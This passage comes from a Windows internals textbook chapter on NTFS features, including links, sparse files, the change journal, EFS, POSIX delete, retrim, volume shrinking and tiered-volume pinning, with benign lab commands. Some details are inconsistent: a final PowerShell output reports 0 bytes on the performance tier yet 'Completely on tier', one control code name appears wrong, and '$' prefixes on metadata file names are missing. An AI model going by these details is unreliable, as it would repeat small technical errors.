and ReFS file system drivers use the exposed FsRtlIsNonEmptyDirectoryReparsePointAllowed API to detect
if a reparse point type is allowed on non-empty directories.
EXPERIMENT: Creating a symbolic link
This experiment shows you the main difference between a symbolic link and a hard link, even
when dealing with files on the same volume. Create a symbolic link called soft.txt as shown here,
pointing to the test.txt file created in the previous experiment:
C:\>mklink soft.txt test.txt
symbolic link created for soft.txt <<===>> test.txt
If you list the directory’s contents, you’ll notice that the symbolic link doesn’t have a file size
and is identified by the <SYMLINK> type. Furthermore, you’ll note that the creation time is that
of the symbolic link, not of the target file. The symbolic link can also have security permissions
that are different from the permissions on the target file.
C:\>dir *.txt
Volume in drive C is OS
Volume Serial Number is 38D4-EA71
Directory of C:\
05/12/2012  11:55 PM                 8 hard.txt
05/13/2012  12:28 AM    <SYMLINK>      soft.txt [test.txt]
05/12/2012  11:55 PM                 8 test.txt
               3 File(s)                 16 bytes
               0 Dir(s)  10,636,480,512 bytes free
Finally, if you delete the original test.txt file, you can verify that both the hard link and sym-
bolic link still exist but that the symbolic link does not point to a valid file anymore, while the hard
link references the file data.
Compression and sparse files
NTFS supports compression of file data. Because NTFS performs compression and decompression
procedures transparently, applications don’t have to be modified to take advantage of this feature.
Directories can also be compressed, which means that any files subsequently created in the directory
are compressed.
Applications compress and decompress files by passing DeviceIoControl the FSCTL_SET_
COMPRESSION file system control code. They query the compression state of a file or directory
with the FSCTL_GET_COMPRESSION file system control code. A file or directory that is compressed
has the FILE_ATTRIBUTE_COMPRESSED flag set in its attributes, so applications can also determine a
file or directory’s compression state with GetFileAttributes.
A second type of compression is known as sparse files. If a file is marked as sparse, NTFS doesn’t al-
locate space on a volume for portions of the file that an application designates as empty. NTFS returns
0-filled buffers when an application reads from empty areas of a sparse file. This type of compression
can be useful for client/server applications that implement circular-buffer logging, in which the server
records information to a file, and clients asynchronously read the information. Because the information
that the server writes isn’t needed after a client has read it, there’s no need to store the information
in the file. By making such a file sparse, the client can specify the portions of the file it reads as empty,
freeing up space on the volume. The server can continue to append new information to the file without
fear that the file will grow to consume all available space on the volume.
As with compressed files, NTFS manages sparse files transparently. Applications specify a file’s
sparseness state by passing the FSCTL_SET_SPARSE file system control code to DeviceIoControl. To set
a range of a file to empty, applications use the FSCTL_SET_ZERO_DATA code, and they can ask NTFS
for a description of what parts of a file are sparse by using the control code FSCTL_QUERY_ALLOCATED
_RANGES. One application of sparse files is the NTFS change journal, described next.
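The effect of sparse allocation — holes that count toward the logical file size but occupy no clusters — can be observed portably. The POSIX sketch below (using the st_blocks field, which is not populated on Windows) demonstrates the concept rather than the NTFS FSCTL interface:

```python
import os
import tempfile

def sparse_demo(hole=100 * 1024 * 1024):
    """Write one byte 100 MB into a new file and compare its logical size
    with the space actually allocated for it."""
    fd, path = tempfile.mkstemp()
    try:
        os.lseek(fd, hole, os.SEEK_SET)  # seek far past end-of-file...
        os.write(fd, b"x")               # ...and write: the gap is a hole
        os.close(fd)
        st = os.stat(path)
        # st_blocks counts 512-byte allocation units (a POSIX-specific field).
        return st.st_size, st.st_blocks * 512
    finally:
        os.unlink(path)
```

On a file system that supports sparseness, the logical size is roughly 100 MB while the allocation is only a handful of kilobytes.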
Change logging
Many types of applications need to monitor volumes for file and directory changes. For example, an
automatic backup program might perform an initial full backup and then incremental backups based
on file changes. An obvious way for an application to monitor a volume for changes is for it to scan the
volume, recording the state of files and directories, and on a subsequent scan detect differences. This
process can adversely affect system performance, however, especially on computers with thousands or
tens of thousands of files.
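A scan-and-diff monitor of the kind just described — shown here as a hypothetical sketch — makes the cost obvious: every pass must walk and stat every file on the volume:

```python
import os

def snapshot(root):
    """Map every file under root to its (mtime, size) pair."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
            except OSError:
                continue  # file vanished between listing and stat
            state[path] = (st.st_mtime_ns, st.st_size)
    return state

def diff(old, new):
    """Compare two snapshots and classify the changes."""
    added = new.keys() - old.keys()
    removed = old.keys() - new.keys()
    changed = {p for p in old.keys() & new.keys() if old[p] != new[p]}
    return added, removed, changed
```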
An alternate approach is for an application to register a directory notification by using the FindFirst
ChangeNotification or ReadDirectoryChangesW Windows function. As an input parameter, the application
specifies the name of a directory it wants to monitor, and the function returns whenever the contents
of the directory change. Although this approach is more efficient than volume scanning, it requires
the application to be running at all times. Using these functions can also require an application to scan
directories because FindFirstChangeNotification doesn’t indicate what changed—just that something
in the directory has changed. An application can pass a buffer to ReadDirectoryChangesW that the FSD
fills in with change records. If the buffer overflows, however, the application must be prepared to fall
back on scanning the directory.
NTFS provides a third approach that overcomes the drawbacks of the first two: an application can
configure the NTFS change journal facility by using the DeviceIoControl function’s FSCTL_CREATE_
USN_JOURNAL file system control code (USN is update sequence number) to have NTFS record infor-
mation about file and directory changes to an internal file called the change journal. A change journal is
usually large enough to virtually guarantee that applications get a chance to process changes without
missing any. Applications use the FSCTL_QUERY_USN_JOURNAL file system control code to read re-
cords from a change journal, and they can specify that the DeviceIoControl function not complete until
new records are available.
Per-user volume quotas
Systems administrators often need to track or limit user disk space usage on shared storage volumes,
so NTFS includes quota-management support. NTFS quota-management support allows for per-user
specification of quota enforcement, which is useful for usage tracking and tracking when a user reaches
warning and limit thresholds. NTFS can be configured to log an event indicating the occurrence to the
System event log if a user surpasses his warning limit. Similarly, if a user attempts to use more volume
storage than her quota limit permits, NTFS can log an event to the System event log and fail the ap-
plication file I/O that would have caused the quota violation with a “disk full” error code.
NTFS tracks a user’s volume usage by relying on the fact that it tags files and directories with the se-
curity ID (SID) of the user who created them. (See Chapter 7, “Security,” in Part 1 for a definition of SIDs.)
The logical sizes of files and directories a user owns count against the user’s administrator-defined
quota limit. Thus, a user can’t circumvent his or her quota limit by creating an empty sparse file that is
larger than the quota would allow and then fill the file with nonzero data. Similarly, whereas a 50 KB file
might compress to 10 KB, the full 50 KB is used for quota accounting.
By default, volumes don’t have quota tracking enabled. You need to use the Quota tab of a vol-
ume’s Properties dialog box, shown in Figure 11-25, to enable quotas, to specify default warning and
limit thresholds, and to configure the NTFS behavior that occurs when a user hits the warning or limit
threshold. The Quota Entries tool, which you can launch from this dialog box, enables an administra-
tor to specify different limits and behavior for each user. Applications that want to interact with NTFS
quota management use COM quota interfaces, including IDiskQuotaControl, IDiskQuotaUser, and
IDiskQuotaEvents.
FIGURE 11-25 The Quota Settings dialog accessible from the volume’s Properties window.
Link tracking
Shell shortcuts allow users to place files in their shell namespaces (on their desktops, for example) that
link to files located in the file system namespace. The Windows Start menu uses shell shortcuts exten-
sively. Similarly, object linking and embedding (OLE) links allow documents from one application to be
transparently embedded in the documents of other applications. The products of the Microsoft Office
suite, including PowerPoint, Excel, and Word, use OLE linking.
Although shell and OLE links provide an easy way to connect files with one another and with the
shell namespace, they can be difficult to manage if a user moves the source of a shell or OLE link (a link
source is the file or directory to which a link points). NTFS in Windows includes support for a service
application called distributed link-tracking, which maintains the integrity of shell and OLE links when
link targets move. Using the NTFS link-tracking support, if a link target located on an NTFS volume
moves to any other NTFS volume within the originating volume’s domain, the link-tracking service can
transparently follow the movement and update the link to reflect the change.
NTFS link-tracking support is based on an optional file attribute known as an object ID. An application
can assign an object ID to a file by using the FSCTL_CREATE_OR_GET_OBJECT_ID (which assigns an ID if
one isn’t already assigned) and FSCTL_SET_OBJECT_ID file system control codes. Object IDs are queried
with the FSCTL_CREATE_OR_GET_OBJECT_ID and FSCTL_GET_OBJECT_ID file system control codes. The
FSCTL_DELETE_OBJECT_ID file system control code lets applications delete object IDs from files.
Encryption
Corporate users often store sensitive information on their computers. Although data stored on com-
pany servers is usually safely protected with proper network security settings and physical access con-
trol, data stored on laptops can be exposed when a laptop is lost or stolen. NTFS file permissions don’t
offer protection because NTFS volumes can be fully accessed without regard to security by using NTFS
file-reading software that doesn’t require Windows to be running. Furthermore, NTFS file permissions
are rendered useless when an alternate Windows installation is used to access files from an adminis-
trator account. Recall from Chapter 6 in Part 1 that the administrator account has the take-ownership
and backup privileges, both of which allow it to access any secured object by overriding the object’s
security settings.
NTFS includes a facility called Encrypting File System (EFS), which users can use to encrypt sensitive
data. The operation of EFS, like that of file compression, is completely transparent to applications, which
means that file data is automatically decrypted when an application running in the account of a user
authorized to view the data reads it and is automatically encrypted when an authorized application
changes the data.
Note NTFS doesn’t permit the encryption of files located in the system volume’s root direc-
tory or in the \Windows directory because many files in these locations are required during
the boot process, and EFS isn’t active during the boot process. BitLocker is a technology
much better suited for environments in which this is a requirement because it supports full-volume
encryption. As we will describe in the next paragraphs, BitLocker collaborates with NTFS to support
file encryption.
EFS relies on cryptographic services supplied by Windows in user mode, so it consists of both a
kernel-mode component that tightly integrates with NTFS as well as user-mode DLLs that communi-
cate with the Local Security Authority Subsystem (LSASS) and cryptographic DLLs.
Files that are encrypted can be accessed only by using the private key of an account’s EFS private/
public key pair, and private keys are locked using an account’s password. Thus, EFS-encrypted files on
lost or stolen laptops can’t be accessed using any means (other than a brute-force cryptographic at-
tack) without the password of an account that is authorized to view the data.
Applications can use the EncryptFile and DecryptFile Windows API functions to encrypt and decrypt
files, and FileEncryptionStatus to retrieve a file or directory’s EFS-related attributes, such as whether the
file or directory is encrypted. A file or directory that is encrypted has the FILE_ATTRIBUTE_ENCRYPTED
flag set in its attributes, so applications can also determine a file or directory’s encryption state with
GetFileAttributes.
POSIX-style delete semantics
The POSIX Subsystem has been deprecated and is no longer available in the Windows operating
system. The Windows Subsystem for Linux (WSL) has replaced the original POSIX Subsystem. The NTFS
file system driver has been updated to unify the differences between I/O operations supported in
Windows and those supported in Linux. One of these differences is provided by the Linux unlink (or rm)
command, which deletes a file or a folder. In Windows, an application can’t delete a file that is in use by
another application (which has an open handle to it); conversely, Linux usually supports this: other pro-
cesses continue to work well with the original deleted file. To support WSL, the NTFS file system driver
in Windows 10 supports a new operation: POSIX Delete.
The Win32 DeleteFile API implements standard file deletion. The target file is opened (a new handle
is created), and then a disposition label is attached to the file through the NtSetInformationFile native
API. The label just communicates to the NTFS file system driver that the file is going to be deleted. The
file system driver checks whether the number of references to the FCB (File Control Block) is equal to 1,
meaning that there is no other outstanding open handle to the file. If so, the file system driver marks
the file as “deleted on close” and then returns. Only when the handle to the file is closed does the
IRP_MJ_CLEANUP dispatch routine physically remove the file from the underlying medium.
A similar architecture is not compatible with the Linux unlink command. The WSL subsystem, when
it needs to erase a file, employs POSIX-style deletion; it calls the NtSetInformationFile native API with
the new FileDispositionInformationEx information class, specifying a flag (FILE_DISPOSITION_POSIX_
SEMANTICS). The NTFS file system driver marks the file as POSIX deleted by inserting a flag in its
Context Control Block (CCB, a data structure that represents the context of an open instance of an
on-disk object). It then re-opens the file with a special internal routine and attaches the new handle
(which we will call the PosixDeleted handle) to the SCB (stream control block). When the original handle
is closed, the NTFS file system driver detects the presence of the PosixDeleted handle and queues a
work item for closing it. When the work item completes, the Cleanup routine detects that the handle
is marked as POSIX delete and physically moves the file into the “\Extend\Deleted” hidden directory.
Other applications can still operate on the original file, which is no longer in the original namespace
and will be deleted only when the last file handle is closed (the first delete request has marked the FCB
as delete-on-close).
If for any unusual reason the system is not able to delete the target file (due to a dangling reference
in a defective kernel driver or due to a sudden power interruption), the next time that the NTFS file sys-
tem has the chance to mount the volume, it checks the \Extend\Deleted directory and deletes every
file included in it by using standard file deletion routines.
Note Starting with the May 2019 Update (19H1), Windows 10 now uses POSIX delete as the
default file deletion method. This means that the DeleteFile API uses the new behavior.
EXPERIMENT: Witnessing POSIX delete
In this experiment, you’re going to witness a POSIX delete through the FsTool application, which
is available in this book’s downloadable resources. Make sure you’re using a copy of Windows
Server 2019 (RS5). Indeed, newer client releases of Windows implement POSIX deletions by
default. Start by opening a command prompt window. Use the /touch FsTool command-line
argument to generate a txt file that’s exclusively used by the application:
D:\>FsTool.exe /touch d:\Test.txt
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Touching "d:\Test.txt" file... Success.
The File handle is valid... Press Enter to write to the file.
When requested, instead of pressing the Enter key, open another command prompt window
and try to open and delete the file:
D:\>type Test.txt
The process cannot access the file because it is being used by another process.
D:\>del Test.txt
D:\>dir Test.txt
Volume in drive D is DATA
Volume Serial Number is 62C1-9EB3
Directory of D:\
12/13/2018  12:34 AM                49 Test.txt
               1 File(s)             49 bytes
               0 Dir(s)  1,486,254,481,408 bytes free
As expected, you can’t open the file while FsTool has exclusive access to it. When you try to
delete the file, the system marks it for deletion, but it’s not able to remove it from the file system
namespace. If you try to delete the file again with File Explorer, you can witness the same behav-
ior. When you press Enter in the first command prompt window and you exit the FsTool applica-
tion, the file is actually deleted by the NTFS file system driver.
The next step is to use a POSIX deletion for getting rid of the file. You can do this by specifying
the /pdel command-line argument to the FsTool application. In the first command prompt win-
dow, restart FsTool with the /touch command-line argument (the original file has been already
marked for deletion, and you can’t delete it again). Before pressing Enter, switch to the second
window and execute the following command:
D:\>FsTool /pdel Test.txt
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Deleting "Test.txt" file (Posix semantics)... Success.
Press any key to exit...
D:\>dir Test.txt
Volume in drive D is DATA
Volume Serial Number is 62C1-9EB3
Directory of D:\
File Not Found
In this case the Test.txt file has been completely removed from the file system’s namespace
but is still valid. If you press Enter in the first command prompt window, FsTool is still able to write
data to the file. This is because the file has been internally moved into the \Extend\Deleted
hidden system directory.
Defragmentation
Even though NTFS makes efforts to keep files contiguous when allocating blocks to extend a file, a vol-
ume’s files can still become fragmented over time, especially if the file is extended multiple times or when
there is limited free space. A file is fragmented if its data occupies discontiguous clusters. For example,
Figure 11-26 shows a fragmented file consisting of five fragments. However, like most file systems (includ-
ing versions of FAT on Windows), NTFS makes no special efforts to keep files contiguous (this is handled
by the built-in defragmenter), other than to reserve a region of disk space known as the master file table
(MFT) zone for the MFT. (NTFS lets other files allocate from the MFT zone when volume free space runs
low.) Keeping an area free for the MFT can help it stay contiguous, but it, too, can become fragmented.
(See the section “Master file table” later in this chapter for more information on MFTs.)
Fragmented file
Contiguous file
FIGURE 11-26 Fragmented and contiguous files.
To facilitate the development of third-party disk defragmentation tools, Windows includes a de-
fragmentation API that such tools can use to move file data so that files occupy contiguous clusters.
The API consists of file system controls that let applications obtain a map of a volume’s free and in-use
clusters (FSCTL_GET_VOLUME_BITMAP), obtain a map of a file’s cluster usage (FSCTL_GET_RETRIEVAL
_POINTERS), and move a file (FSCTL_MOVE_FILE).
Windows includes a built-in defragmentation tool that is accessible by using the Optimize Drives
utility (%SystemRoot%\System32\Dfrgui.exe), shown in Figure 11-27, as well as a command-line inter-
face, %SystemRoot%\System32\Defrag.exe, that you can run interactively or schedule, but that does
not produce detailed reports or offer control—such as excluding files or directories—over the defrag-
mentation process.
FIGURE 11-27 The Optimize Drives tool.
The only limitation imposed by the defragmentation implementation in NTFS is that paging
files and NTFS log files can’t be defragmented. The Optimize Drives tool is the evolution of the Disk
Defragmenter, which was available in Windows 7. The tool has been updated to support tiered vol-
umes, SMR disks, and SSD disks. The optimization engine is implemented in the Optimize Drive service
(Defragsvc.dll), which exposes the IDefragEngine COM interface used by both the graphical tool and
the command-line interface.
For SSD disks, the tool also implements the retrim operation. To understand the retrim operation,
a quick introduction of the architecture of a solid-state drive is needed. SSD disks store data in flash
memory cells that are grouped into pages of 4 to 16 KB, grouped together into blocks of typically 128
to 512 pages. Flash memory cells can only be directly written to when they’re empty. If they contain
data, the contents must be erased before a write operation. An SSD write operation can be done on
a single page but, due to hardware limitations, erase commands always affect entire blocks; conse-
quently, writing data to empty pages on an SSD is very fast but slows down considerably once previ-
ously written pages need to be overwritten. (In this case, first the content of the entire block is stored in
cache, and then the entire block is erased from the SSD. The overwritten page is written to the cached
block, and finally the entire updated block is written to the flash medium.) To overcome this problem,
the NTFS File System Driver tries to send a TRIM command to the SSD controller every time it deletes
the disk’s clusters (which could partially or entirely belong to a file). In response to the TRIM command,
the SSD, if possible, starts to asynchronously erase entire blocks. Note that the SSD controller
can’t do anything when the deleted area corresponds only to some pages of a block.
The retrim operation analyzes the SSD disk and starts to send a TRIM command to every cluster in
the free space (in chunks of 1-MB size). There are different motivations behind this:
■	TRIM commands are not always emitted. (The file system is not very strict on trims.)
■	The NTFS File System emits TRIM commands on pages, but not on SSD blocks. The Disk Optimizer, with the retrim operation, searches for fragmented blocks. For those blocks, it first moves valid data back to some temporary blocks, defragmenting the original ones and even inserting pages that belong to other fragmented blocks; finally, it emits TRIM commands on the original cleaned blocks.
Note The way in which the Disk Optimizer emits TRIM commands on free space is some-
what tricky: Disk Optimizer allocates an empty sparse file and searches for a chunk (the size
of which varies from 128 KB to 1 GB) of free space. It then calls the file system through the
FSCTL_MOVE_FILE control code and moves data from the sparse file (which has a size of 1
GB but does not actually contain any valid data) into the empty space. The underlying file
system actually erases the content of the one or more SSD blocks (sparse files with no valid
data yield back chunks of zeroed data when read). This effectively exercises the TRIM
implementation provided by the SSD firmware.
For Tiered and SMR disks, the Optimize Drives tool supports two supplementary operations: Slabify
(also known as Slab Consolidation) and Tier Optimization. Big files stored on tiered volumes can be
composed of different Extents residing in different tiers. The Slab consolidation operation not only
defragments the extent table (a phase called Consolidation) of a file, but it also moves the file content
in congruent slabs (a slab is a unit of allocation of a thinly provisioned disk; see the “Storage Spaces”
section later in this chapter for more information). The final goal of Slab Consolidation is to allow files
to use a smaller number of slabs. Tier Optimization moves frequently accessed files (including files that
have been explicitly pinned) from the capacity tier to the performance tier and, vice versa, moves less
frequently accessed files from the performance tier to the capacity tier. To do so, the optimization en-
gine consults the tiering engine, which provides file extents that should be moved to the capacity tier
and those that should be moved to the performance tier, based on the Heat map for every file accessed
by the user.
Note Tiered disks and the tiering engine are covered in detail in the following sections of
the current chapter.
EXPERIMENT: Retrim an SSD volume
You can execute a Retrim on a fast SSD or NVMe volume by using the defrag.exe /L command,
as in the following example:
D:\>defrag /L c:
Microsoft Drive Optimizer
Copyright (c) Microsoft Corp.
Invoking retrim on (C:)...
The operation completed successfully.
Post Defragmentation Report:
Volume Information:
  Volume size         = 475.87 GB
  Free space          = 343.80 GB
Retrim:
  Total space trimmed = 341.05 GB
In the example, the volume size was 475.87 GB, with 343.80 GB of free space. Only 341 GB
have been erased and trimmed. Obviously, if you execute the command on volumes backed by
a classical HDD, you will get back an error. (The operation requested is not supported by the
hardware backing the volume.)
Dynamic partitioning
The NTFS driver allows users to dynamically resize any partition, including the system partition, either
shrinking or expanding it (if enough space is available). Expanding a partition is easy if enough space
exists on the disk and the expansion is performed through the FSCTL_EXPAND_VOLUME file system
control code. Shrinking a partition is a more complicated process because it requires moving any file
system data that is currently in the area to be thrown away to the region that will still remain after the
shrinking process (a mechanism similar to defragmentation). Shrinking is implemented by two compo-
nents: the shrinking engine and the file system driver.
The shrinking engine is implemented in user mode. It communicates with NTFS to determine the
maximum number of reclaimable bytes—that is, how much data can be moved from the region that
will be resized into the region that will remain. The shrinking engine uses the standard defragmenta-
tion mechanism shown earlier, which doesn’t support relocating page file fragments that are in use or
any other files that have been marked as unmovable with the FSCTL_MARK_HANDLE file system con-
trol code (like the hibernation file). The master file table backup (MftMirr), the NTFS metadata transac-
tion log (LogFile), and the volume label file (Volume) cannot be moved, which limits the minimum
size of the shrunk volume and causes wasted space.
The file system driver shrinking code is responsible for ensuring that the volume remains in a consis-
tent state throughout the shrinking process. To do so, it exposes an interface that uses three requests
that describe the current operation, which are sent through the FSCTL_SHRINK_VOLUME control code:
■	The ShrinkPrepare request, which must be issued before any other operation. This request takes the desired size of the new volume in sectors and is used so that the file system can block further allocations outside the new volume boundary. The ShrinkPrepare request doesn’t verify whether the volume can actually be shrunk by the specified amount, but it does ensure that the amount is numerically valid and that there aren’t any other shrinking operations ongoing. Note that after a prepare operation, the file handle to the volume becomes associated with the shrink request. If the file handle is closed, the operation is assumed to be aborted.
■	The ShrinkCommit request, which the shrinking engine issues after a ShrinkPrepare request. In this state, the file system attempts the removal of the requested number of clusters in the most recent prepare request. (If multiple prepare requests have been sent with different sizes, the last one is the determining one.) The ShrinkCommit request assumes that the shrinking engine has completed and will fail if any allocated blocks remain in the area to be shrunk.
■	The ShrinkAbort request, which can be issued by the shrinking engine or caused by events such as the closure of the file handle to the volume. This request undoes the ShrinkCommit operation by returning the partition to its original size and allows new allocations outside the shrunk region to occur again. However, defragmentation changes made by the shrinking engine remain.
If a system is rebooted during a shrinking operation, NTFS restores the file system to a consistent
state via its metadata recovery mechanism, explained later in the chapter. Because the actual shrink
operation isn’t executed until all other operations have been completed, the volume retains its original
size and only defragmentation operations that had already been flushed out to disk persist.
Finally, shrinking a volume has several effects on the volume shadow copy mechanism. Recall that the
copy-on-write mechanism allows VSS to simply retain parts of the file that were actually modified while
still linking to the original file data. For deleted files, this file data will not be associated with visible files
but appears as free space instead—free space that will likely be located in the area that is about to be
shrunk. The shrinking engine therefore communicates with VSS to engage it in the shrinking process. In
summary, the VSS mechanism’s job is to copy deleted file data into its differencing area and to increase
the differencing area as required to accommodate additional data. This detail is important because it
poses another constraint on the size to which even volumes with ample free space can shrink.
NTFS support for tiered volumes
Tiered volumes are composed of different types of storage devices and underlying media. Tiered vol-
umes are usually created on the top of a single physical or virtual disk. Storage Spaces provides virtual
disks that are composed of multiple physical disks, which can be of different types (and have different
performance): fast NVMe disks, SSD, and Rotating Hard-Disk. A virtual disk of this type is called a tiered
disk. (Storage Spaces uses the name Storage Tiers.) On the other hand, tiered volumes could be created
on the top of physical SMR disks, which have a conventional “random-access” fast zone and a “strictly
sequential” capacity area. All tiered volumes have the common characteristic that they are composed
of a “performance” tier, which supports fast random I/O, and a “capacity” tier, which may or may not
support random I/O, is slower, and has a large capacity.
Note SMR disks, tiered volumes, and Storage Spaces will be discussed in more detail later in
this chapter.
The NTFS File System driver supports tiered volumes in multiple ways:
■	The volume is split in two zones, which correspond to the tiered disk areas (capacity and performance).
■	The new $DSC attribute (of type LOGGED_UTILITY_STREAM) specifies which tier the file should be stored in. NTFS exposes a new “pinning” interface, which allows a file to be locked in a particular tier (from here derives the term “pinning”) and prevents the file from being moved by the tiering engine.
■	The Storage Tiers Management service has a central role in supporting tiered volumes. The NTFS file system driver records ETW “heat” events every time a file stream is read or written. The tiering engine consumes these events, accumulates them (in 1-MB chunks), and periodically records them in a JET database (once every hour). Every four hours, the tiering engine processes the Heat database and through a complex “heat aging” algorithm decides which file is considered recent (hot) and which is considered old (cold). The tiering engine moves the files between the performance and the capacity tiers based on the calculated Heat data.
Furthermore, the NTFS allocator has been modified to allocate file clusters based on the tier area
that has been specified in the $DSC attribute. The NTFS Allocator uses a specific algorithm to decide
from which tier to allocate the volume’s clusters. The algorithm operates by performing checks in the
following order:
1.	If the file is the Volume USN Journal, always allocate from the Capacity tier.
2.	MFT entries (File Records) and system metadata files are always allocated from the Performance tier.
3.	If the file has been previously explicitly “pinned” (meaning that the file has the $DSC attribute), allocate from the specified storage tier.
4.	If the system runs a client edition of Windows, always prefer the Performance tier; otherwise, allocate from the Capacity tier.
5.	If there is no space in the Performance tier, allocate from the Capacity tier.
An application can specify the desired storage tier for a file by using the NtSetInformationFile API
with the FileDesiredStorageClassInformation information class. This operation is called file pinning, and,
if executed on a handle of a newly created file, the central allocator will allocate the new file content in
the specified tier. Otherwise, if the file already exists and is located on the wrong tier, the tiering engine
will move the file to the desired tier the next time it runs. (This operation is called Tier optimization and
can be initiated by the Tiering Engine scheduled task or the SchedulerDefrag task.)
Note It’s important to note here that the support for tiered volumes in NTFS, described here,
is completely different from the support provided by the ReFS file system driver.
EXPERIMENT: Witnessing file pinning in tiered volumes
As we have described in the previous section, the NTFS allocator uses a specific algorithm to
decide which tier to allocate from. In this experiment, you copy a big file into a tiered volume
and understand what the implications of the File Pinning operation are. After the copy finishes,
open an administrative PowerShell window by right-clicking on the Start menu icon and select-
ing Windows PowerShell (Admin) and use the Get-FileStorageTier command to get the tier
information for the file:
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' | FL FileSize,
DesiredStorageTierClass, FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass,
PlacementStatus, State
FileSize                       : 4556566528
DesiredStorageTierClass        : Unknown
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass    : 4556566528
PlacementStatus                : Unknown
State                          : Unknown
The example shows that the Big_Image.iso file has been allocated from the Capacity Tier. (The
example has been executed on a Windows Server system.) To confirm this, just copy the file from
the tiered disk to a fast SSD volume. You should see a slow transfer speed (usually between 160
and 250 MB/s depending on the rotating disk speed):
You can now execute the “pin” request through the Set-FileStorageTier command, like in the
following example:
PS E:\> Get-StorageTier -MediaType SSD | FL FriendlyName, Size, FootprintOnPool, UniqueId
FriendlyName    : SSD
Size            : 128849018880
FootprintOnPool : 128849018880
UniqueId        : {448abab8-f00b-42d6-b345-c8da68869020}
PS E:\> Set-FileStorageTier -FilePath 'E:\Big_Image.iso' -DesiredStorageTierFriendlyName
'SSD'
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' | FL FileSize,
DesiredStorageTierClass, FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass,
PlacementStatus, State
FileSize                       : 4556566528
DesiredStorageTierClass        : Performance
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass    : 4556566528
PlacementStatus                : Not on tier
State                          : Pending
The example above shows that the file has been correctly pinned on the Performance
tier, but its content is still stored in the Capacity tier. When the Tiering Engine scheduled task
runs, it moves the file extents from the Capacity to the Performance tier. You can force a Tier
Optimization by running the Drive optimizer through the defrag.exe /g built-in tool:
PS E:> defrag /g /h e:
Microsoft Drive Optimizer
Copyright (c) Microsoft Corp.
Invoking tier optimization on Test (E:)...
Pre-Optimization Report:
Volume Information:
    Volume size             = 2.22 TB
    Free space              = 1.64 TB
    Total fragmented space  = 36%
    Largest free space size = 1.56 TB
Note: File fragments larger than 64MB are not included in the fragmentation statistics.
The operation completed successfully.
Post Defragmentation Report:
Volume Information:
    Volume size = 2.22 TB
    Free space  = 1.64 TB
Storage Tier Optimization Report:
% I/Os Serviced from Perf Tier    Perf Tier Size Required
100%                              28.51 GB *
 95%                              22.86 GB
...
 20%                              2.44 GB
 15%                              1.58 GB
 10%                              873.80 MB
  5%                              361.28 MB
* Current size of the Performance tier: 474.98 GB
Percent of total I/Os serviced from the Performance tier: 99%
Size of files pinned to the Performance tier: 4.21 GB
Percent of total I/Os: 1%
Size of files pinned to the Capacity tier: 0 bytes
Percent of total I/Os: 0%
The Drive Optimizer has confirmed the pinning of the file. You can check the pinning status
again by executing the Get-FileStorageTier command and by copying the file again to an SSD
volume. This time, the transfer rate should be much higher because the file content is entirely
located in the Performance tier.
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' | FL FileSize, DesiredStorageTierClass,
FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass, PlacementStatus, State
FileSize                       : 4556566528
DesiredStorageTierClass        : Performance
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass    : 4556566528
PlacementStatus                : Completely on tier
State                          : OK
You could repeat the experiment in a client edition of Windows 10 by pinning the file to the
Capacity tier (client editions of Windows 10 allocate a file's clusters from the Performance tier by
default). The same pinning functionality has been implemented in the FsTool application
available in this book's downloadable resources, which can be used to copy a file directly into a
preferred tier.
NTFS file system driver
As described in Chapter 6 in Part I, in the framework of the Windows I/O system, NTFS and other file
systems are loadable device drivers that run in kernel mode. They are invoked indirectly by applications
that use Windows or other I/O APIs. As Figure 11-28 shows, the Windows environment subsystems
call Windows system services, which in turn locate the appropriate loaded drivers and call them. (For a
description of system service dispatching, see the section "System service dispatching" in Chapter 8.)
FIGURE 11-28 Components of the Windows I/O system. (In user mode, an environment subsystem or DLL calls
Windows system services; in kernel mode, the I/O manager routes requests to the NTFS driver, volume manager,
and disk driver, alongside executive components such as the object manager, security reference monitor,
memory manager, and the advanced local procedure call facility.)
The layered drivers pass I/O requests to one another by calling the Windows executive's I/O manager.
Relying on the I/O manager as an intermediary allows each driver to maintain independence so
that it can be loaded or unloaded without affecting other drivers. In addition, the NTFS driver interacts
with the three other Windows executive components, shown in the left side of Figure 11-29, which are
closely related to file systems.
The log file service (LFS) is the part of NTFS that provides services for maintaining a log of disk
writes. The log file that LFS writes is used to recover an NTFS-formatted volume in the case of a system
failure. (See the section “Log file service” later in this chapter.)
FIGURE 11-29 NTFS and related components. (The NTFS driver logs transactions through the log file service
and caches file data through the cache manager, which accesses mapped files and flushes the cache through
the memory manager; reads and writes to mirrored or striped volumes and to the disk flow through the
volume manager and disk driver, all under the I/O manager.)
As we have already described, the cache manager is the component of the Windows executive that
provides systemwide caching services for NTFS and other file system drivers, including network file
system drivers (servers and redirectors). All file systems implemented for Windows access cached files by
mapping them into system address space and then accessing the virtual memory. The cache manager
provides a specialized file system interface to the Windows memory manager for this purpose. When
a program tries to access a part of a file that isn't loaded into the cache (a cache miss), the memory
manager calls NTFS to access the disk driver and obtain the file contents from disk. The cache manager
optimizes disk I/O by using its lazy writer threads to call the memory manager to flush cache contents
to disk as a background activity (asynchronous disk writing).
NTFS, like other file systems, participates in the Windows object model by implementing files as
objects. This implementation allows files to be shared and protected by the object manager, the
component of Windows that manages all executive-level objects. (The object manager is described in the
section "Object manager" in Chapter 8.)
An application creates and accesses files just as it does other Windows objects: by means of object
handles. By the time an I/O request reaches NTFS, the Windows object manager and security system
have already verified that the calling process has the authority to access the file object in the way it is
attempting to. The security system has compared the caller’s access token to the entries in the access
control list for the file object. (See Chapter 7 in Part 1 for more information about access control lists.)
The I/O manager has also transformed the file handle into a pointer to a file object. NTFS uses the
information in the file object to access the file on disk.
Figure 11-30 shows the data structures that link a file handle to the file system’s on-disk structure.
